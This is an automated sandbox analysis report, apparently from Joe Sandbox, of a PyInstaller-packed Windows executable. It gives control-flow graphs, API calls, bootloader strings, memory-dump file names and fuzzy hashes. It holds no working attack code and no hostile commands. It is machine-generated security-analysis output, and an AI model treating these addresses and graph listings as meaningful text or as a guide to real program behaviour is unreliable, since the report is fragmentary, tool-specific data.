                                                                                                                                                                                                                                                        control_flow_graph 0 7ff65e2889e0-7ff65e288b26 call 7ff65e28c850 call 7ff65e289390 SetConsoleCtrlHandler GetStartupInfoW call 7ff65e2953f0 call 7ff65e29a47c call 7ff65e29871c call 7ff65e2953f0 call 7ff65e29a47c call 7ff65e29871c call 7ff65e2953f0 call 7ff65e29a47c call 7ff65e29871c GetCommandLineW CreateProcessW 23 7ff65e288b28-7ff65e288b48 GetLastError call 7ff65e282c50 0->23 24 7ff65e288b4d-7ff65e288b89 RegisterClassW 0->24 32 7ff65e288e39-7ff65e288e5f call 7ff65e28c550 23->32 26 7ff65e288b91-7ff65e288be5 CreateWindowExW 24->26 27 7ff65e288b8b GetLastError 24->27 29 7ff65e288bef-7ff65e288bf4 ShowWindow 26->29 30 7ff65e288be7-7ff65e288bed GetLastError 26->30 27->26 31 7ff65e288bfa-7ff65e288c0a WaitForSingleObject 29->31 30->31 33 7ff65e288c88-7ff65e288c8f 31->33 34 7ff65e288c0c 31->34 37 7ff65e288c91-7ff65e288ca1 WaitForSingleObject 33->37 38 7ff65e288cd2-7ff65e288cd9 33->38 36 7ff65e288c10-7ff65e288c13 34->36 40 7ff65e288c15 GetLastError 36->40 41 7ff65e288c1b-7ff65e288c22 36->41 42 7ff65e288ca7-7ff65e288cb7 TerminateProcess 37->42 43 7ff65e288df8-7ff65e288e02 37->43 44 7ff65e288cdf-7ff65e288cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->44 45 7ff65e288dc0-7ff65e288dd9 GetMessageW 38->45 40->41 41->37 47 7ff65e288c24-7ff65e288c41 PeekMessageW 41->47 52 7ff65e288cbf-7ff65e288ccd WaitForSingleObject 42->52 53 7ff65e288cb9 GetLastError 42->53 50 7ff65e288e11-7ff65e288e35 GetExitCodeProcess CloseHandle * 2 43->50 51 7ff65e288e04-7ff65e288e0a DestroyWindow 43->51 46 7ff65e288d00-7ff65e288d38 MsgWaitForMultipleObjects PeekMessageW 44->46 48 7ff65e288def-7ff65e288df6 45->48 49 7ff65e288ddb-7ff65e288de9 TranslateMessage DispatchMessageW 45->49 54 7ff65e288d73-7ff65e288d7a 46->54 55 7ff65e288d3a 46->55 56 7ff65e288c43-7ff65e288c74 TranslateMessage DispatchMessageW PeekMessageW 47->56 57 7ff65e288c76-7ff65e288c86 WaitForSingleObject 47->57 48->43 48->45 49->48 50->32 51->50 52->43 53->52 54->45 59 7ff65e288d7c-7ff65e288da5 QueryPerformanceCounter 54->59 58 7ff65e288d40-7ff65e288d71 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->33 57->36 58->54 58->58 59->46 60 7ff65e288dab-7ff65e288db2 59->60 60->43 61 7ff65e288db4-7ff65e288db8 60->61 61->45
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                        • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                        • Instruction ID: 43e4283f9dd56cf59b8c0e12dfa6f8cf4fc24f1b1fb76e800882b82e956e2f8b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D16032A08B8286EF149F34EA542A93761FFA4758F484235FA5EE2A9CDF7CD544C700
                                                                                                                                                                                                                                                        Function 00007FF65E281000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 62 7ff65e281000-7ff65e283806 call 7ff65e28fe18 call 7ff65e28fe20 call 7ff65e28c850 call 7ff65e2953f0 call 7ff65e295484 call 7ff65e2836b0 76 7ff65e283808-7ff65e28380f 62->76 77 7ff65e283814-7ff65e283836 call 7ff65e281950 62->77 78 7ff65e283c97-7ff65e283cb2 call 7ff65e28c550 76->78 83 7ff65e28383c-7ff65e283856 call 7ff65e281c80 77->83 84 7ff65e28391b-7ff65e283931 call 7ff65e2845c0 77->84 88 7ff65e28385b-7ff65e28389b call 7ff65e288830 83->88 89 7ff65e28396a-7ff65e28397f call 7ff65e282710 84->89 90 7ff65e283933-7ff65e283960 call 7ff65e287f90 84->90 95 7ff65e28389d-7ff65e2838a3 88->95 96 7ff65e2838c1-7ff65e2838cc call 7ff65e294f30 88->96 104 7ff65e283c8f 89->104 102 7ff65e283984-7ff65e2839a6 call 7ff65e281c80 90->102 103 7ff65e283962-7ff65e283965 call 7ff65e29004c 90->103 99 7ff65e2838a5-7ff65e2838ad 95->99 100 7ff65e2838af-7ff65e2838bd call 7ff65e2889a0 95->100 111 7ff65e2839fc-7ff65e283a2a call 7ff65e288940 call 7ff65e2889a0 * 3 96->111 112 7ff65e2838d2-7ff65e2838e1 call 7ff65e288830 96->112 99->100 100->96 113 7ff65e2839b0-7ff65e2839b9 102->113 103->89 104->78 138 7ff65e283a2f-7ff65e283a3e call 7ff65e288830 111->138 120 7ff65e2838e7-7ff65e2838ed 112->120 121 7ff65e2839f4-7ff65e2839f7 call 7ff65e294f30 112->121 113->113 116 7ff65e2839bb-7ff65e2839d8 call 7ff65e281950 113->116 116->88 127 7ff65e2839de-7ff65e2839ef call 7ff65e282710 116->127 125 7ff65e2838f0-7ff65e2838fc 120->125 121->111 128 7ff65e283905-7ff65e283908 125->128 129 7ff65e2838fe-7ff65e283903 125->129 127->104 128->121 131 7ff65e28390e-7ff65e283916 call 7ff65e294f30 128->131 129->125 129->128 131->138 141 7ff65e283b45-7ff65e283b53 138->141 142 7ff65e283a44-7ff65e283a47 138->142 144 7ff65e283b59-7ff65e283b5d 141->144 145 7ff65e283a67 141->145 142->141 143 7ff65e283a4d-7ff65e283a50 142->143 147 7ff65e283a56-7ff65e283a5a 143->147 148 7ff65e283b14-7ff65e283b17 143->148 146 7ff65e283a6b-7ff65e283a90 call 7ff65e294f30 144->146 145->146 157 7ff65e283aab-7ff65e283ac0 146->157 158 7ff65e283a92-7ff65e283aa6 call 7ff65e288940 146->158 147->148 149 7ff65e283a60 147->149 150 7ff65e283b19-7ff65e283b1d 148->150 151 7ff65e283b2f-7ff65e283b40 call 7ff65e282710 148->151 149->145 150->151 153 7ff65e283b1f-7ff65e283b2a 150->153 161 7ff65e283c7f-7ff65e283c87 151->161 153->146 159 7ff65e283be8-7ff65e283bfa call 7ff65e288830 157->159 160 7ff65e283ac6-7ff65e283aca 157->160 158->157 169 7ff65e283bfc-7ff65e283c02 159->169 170 7ff65e283c2e 159->170 164 7ff65e283bcd-7ff65e283be2 call 7ff65e281940 160->164 165 7ff65e283ad0-7ff65e283ae8 call 7ff65e295250 160->165 161->104 164->159 164->160 175 7ff65e283aea-7ff65e283b02 call 7ff65e295250 165->175 176 7ff65e283b62-7ff65e283b7a call 7ff65e295250 165->176 173 7ff65e283c04-7ff65e283c1c 169->173 174 7ff65e283c1e-7ff65e283c2c 169->174 177 7ff65e283c31-7ff65e283c40 call 7ff65e294f30 170->177 173->177 174->177 175->164 186 7ff65e283b08-7ff65e283b0f 175->186 184 7ff65e283b7c-7ff65e283b80 176->184 185 7ff65e283b87-7ff65e283b9f call 7ff65e295250 176->185 187 7ff65e283c46-7ff65e283c4a 177->187 188 7ff65e283d41-7ff65e283d63 call 7ff65e2844e0 177->188 184->185 197 7ff65e283bac-7ff65e283bc4 call 7ff65e295250 185->197 198 7ff65e283ba1-7ff65e283ba5 185->198 186->164 190 7ff65e283cd4-7ff65e283ce6 call 7ff65e288830 187->190 191 7ff65e283c50-7ff65e283c5f call 7ff65e2890e0 187->191 201 7ff65e283d65-7ff65e283d6f call 7ff65e284630 188->201 202 7ff65e283d71-7ff65e283d82 call 7ff65e281c80 188->202 207 7ff65e283ce8-7ff65e283ceb 190->207 208 7ff65e283d35-7ff65e283d3c 190->208 205 7ff65e283cb3-7ff65e283cb6 call 7ff65e288660 191->205 206 7ff65e283c61 191->206 197->164 220 7ff65e283bc6 197->220 198->197 211 7ff65e283d87-7ff65e283d96 201->211 202->211 219 7ff65e283cbb-7ff65e283cbd 205->219 214 7ff65e283c68 call 7ff65e282710 206->214 207->208 215 7ff65e283ced-7ff65e283d10 call 7ff65e281c80 207->215 208->214 217 7ff65e283d98-7ff65e283d9f 211->217 218 7ff65e283dc4-7ff65e283dda call 7ff65e289390 211->218 222 7ff65e283c6d-7ff65e283c77 214->222 228 7ff65e283d2b-7ff65e283d33 call 7ff65e294f30 215->228 229 7ff65e283d12-7ff65e283d26 call 7ff65e282710 call 7ff65e294f30 215->229 217->218 224 7ff65e283da1-7ff65e283da5 217->224 234 7ff65e283ddc 218->234 235 7ff65e283de8-7ff65e283e04 SetDllDirectoryW 218->235 226 7ff65e283cc8-7ff65e283ccf 219->226 227 7ff65e283cbf-7ff65e283cc6 219->227 220->164 222->161 224->218 230 7ff65e283da7-7ff65e283dbe SetDllDirectoryW LoadLibraryExW 224->230 226->211 227->214 228->211 229->222 230->218 234->235 238 7ff65e283e0a-7ff65e283e19 call 7ff65e288830 235->238 239 7ff65e283f01-7ff65e283f08 235->239 249 7ff65e283e1b-7ff65e283e21 238->249 250 7ff65e283e32-7ff65e283e3c call 7ff65e294f30 238->250 241 7ff65e284008-7ff65e284010 239->241 242 7ff65e283f0e-7ff65e283f15 239->242 246 7ff65e284035-7ff65e284067 call 7ff65e2836a0 call 7ff65e283360 call 7ff65e283670 call 7ff65e286fc0 call 7ff65e286d70 241->246 247 7ff65e284012-7ff65e28402f PostMessageW GetMessageW 241->247 242->241 245 7ff65e283f1b-7ff65e283f25 call 7ff65e2833c0 242->245 245->222 260 7ff65e283f2b-7ff65e283f3f call 7ff65e2890c0 245->260 247->246 253 7ff65e283e2d-7ff65e283e2f 249->253 254 7ff65e283e23-7ff65e283e2b 249->254 262 7ff65e283ef2-7ff65e283efc call 7ff65e288940 250->262 263 7ff65e283e42-7ff65e283e48 250->263 253->250 254->253 272 7ff65e283f64-7ff65e283fa0 call 7ff65e288940 call 7ff65e2889e0 call 7ff65e286fc0 call 7ff65e286d70 call 7ff65e2888e0 260->272 273 7ff65e283f41-7ff65e283f5e PostMessageW GetMessageW 260->273 262->239 263->262 267 7ff65e283e4e-7ff65e283e54 263->267 270 7ff65e283e56-7ff65e283e58 267->270 271 7ff65e283e5f-7ff65e283e61 267->271 276 7ff65e283e5a 270->276 277 7ff65e283e67-7ff65e283e83 call 7ff65e286dc0 call 7ff65e287340 270->277 271->239 271->277 308 7ff65e283fa5-7ff65e283fa7 272->308 273->272 276->239 289 7ff65e283e85-7ff65e283e8c 277->289 290 7ff65e283e8e-7ff65e283e95 277->290 292 7ff65e283edb-7ff65e283ef0 call 7ff65e282a50 call 7ff65e286fc0 call 7ff65e286d70 289->292 293 7ff65e283e97-7ff65e283ea4 call 7ff65e286e00 290->293 294 7ff65e283eaf-7ff65e283eb9 call 7ff65e2871b0 290->294 292->239 293->294 305 7ff65e283ea6-7ff65e283ead 293->305 306 7ff65e283ebb-7ff65e283ec2 294->306 307 7ff65e283ec4-7ff65e283ed2 call 7ff65e2874f0 294->307 305->292 306->292 307->239 319 7ff65e283ed4 307->319 311 7ff65e283fa9-7ff65e283fbf call 7ff65e288ed0 call 7ff65e2888e0 308->311 312 7ff65e283ff5-7ff65e284003 call 7ff65e281900 308->312 311->312 323 7ff65e283fc1-7ff65e283fd6 311->323 312->222 319->292 324 7ff65e283fd8-7ff65e283feb call 7ff65e282710 call 7ff65e281900 323->324 325 7ff65e283ff0 call 7ff65e282a50 323->325 324->222 325->312
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                        • Opcode ID: 70f35d0e66d36ee0c12c04131c66672e70214a69f3e2bc28babfc23e8b7209f8
                                                                                                                                                                                                                                                        • Instruction ID: c2d361cd21ac02f42fbc834b316bad703b9ea4bbe7922868f994ac3e733a15dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70f35d0e66d36ee0c12c04131c66672e70214a69f3e2bc28babfc23e8b7209f8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE327A22A0C78291FE199B25D7552B937A1AF74780F8C4036FA5DE26DEEF6CE558C300
                                                                                                                                                                                                                                                        Function 00007FF65E2A6964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 538 7ff65e2a6964-7ff65e2a69d7 call 7ff65e2a6698 541 7ff65e2a69f1-7ff65e2a69fb call 7ff65e298520 538->541 542 7ff65e2a69d9-7ff65e2a69e2 call 7ff65e294ee8 538->542 548 7ff65e2a6a16-7ff65e2a6a7f CreateFileW 541->548 549 7ff65e2a69fd-7ff65e2a6a14 call 7ff65e294ee8 call 7ff65e294f08 541->549 547 7ff65e2a69e5-7ff65e2a69ec call 7ff65e294f08 542->547 565 7ff65e2a6d32-7ff65e2a6d52 547->565 551 7ff65e2a6a81-7ff65e2a6a87 548->551 552 7ff65e2a6afc-7ff65e2a6b07 GetFileType 548->552 549->547 555 7ff65e2a6ac9-7ff65e2a6af7 GetLastError call 7ff65e294e7c 551->555 556 7ff65e2a6a89-7ff65e2a6a8d 551->556 558 7ff65e2a6b09-7ff65e2a6b44 GetLastError call 7ff65e294e7c CloseHandle 552->558 559 7ff65e2a6b5a-7ff65e2a6b61 552->559 555->547 556->555 563 7ff65e2a6a8f-7ff65e2a6ac7 CreateFileW 556->563 558->547 573 7ff65e2a6b4a-7ff65e2a6b55 call 7ff65e294f08 558->573 561 7ff65e2a6b63-7ff65e2a6b67 559->561 562 7ff65e2a6b69-7ff65e2a6b6c 559->562 568 7ff65e2a6b72-7ff65e2a6bc7 call 7ff65e298438 561->568 562->568 569 7ff65e2a6b6e 562->569 563->552 563->555 577 7ff65e2a6be6-7ff65e2a6c17 call 7ff65e2a6418 568->577 578 7ff65e2a6bc9-7ff65e2a6bd5 call 7ff65e2a68a0 568->578 569->568 573->547 583 7ff65e2a6c19-7ff65e2a6c1b 577->583 584 7ff65e2a6c1d-7ff65e2a6c5f 577->584 578->577 585 7ff65e2a6bd7 578->585 586 7ff65e2a6bd9-7ff65e2a6be1 call 7ff65e29aac0 583->586 587 7ff65e2a6c81-7ff65e2a6c8c 584->587 588 7ff65e2a6c61-7ff65e2a6c65 584->588 585->586 586->565 590 7ff65e2a6d30 587->590 591 7ff65e2a6c92-7ff65e2a6c96 587->591 588->587 589 7ff65e2a6c67-7ff65e2a6c7c 588->589 589->587 590->565 591->590 593 7ff65e2a6c9c-7ff65e2a6ce1 CloseHandle CreateFileW 591->593 595 7ff65e2a6ce3-7ff65e2a6d11 GetLastError call 7ff65e294e7c call 7ff65e298660 593->595 596 7ff65e2a6d16-7ff65e2a6d2b 593->596 595->596 596->590
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction ID: d0177ce1be0bee088148b4495f113e7439d53a4f72a89d66a43012e1b8f275c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09C1B036B28A4285EF10CFA5D6906AC3761FB59B98F095235EE2EE7798CF78D055C300
                                                                                                                                                                                                                                                        Function 00007FF65E2883C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E28842B
                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884AE
                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884CD
                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884DB
                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884EC
                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884F5
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                        • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                        • Instruction ID: c2a9615965b252afcbe819d3e505cd3599a4b7872b6bf1eefe3dbb098635dbc3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82416222A0C64385EE249B64E7441BA73A1FBA4754F881272F55DE2A9CEF7CE545C700
                                                                                                                                                                                                                                                        Function 00007FF65E289280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                        • Instruction ID: c1165587a0c225283c145e2e84010987ca35b66f3e920d1931b50ea4d07d27fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21F0C822A1C74186FFA08B60B78976A7350EB94324F0C0335E96DA2ADDDF7CD048CA00
                                                                                                                                                                                                                                                        Function 00007FF65E2A08C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                                        • Opcode ID: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                                                                                                                                                                                                                        • Instruction ID: 1399e8a982d23536aec3e4898cd328f57b866e8675aa60ac178d943ffba745d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C502AA22B5DA4240FE659F119710A793780BF61BA0F5D5A34FE5EE63DADEBCE4408302
                                                                                                                                                                                                                                                        Function 00007FF65E281950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
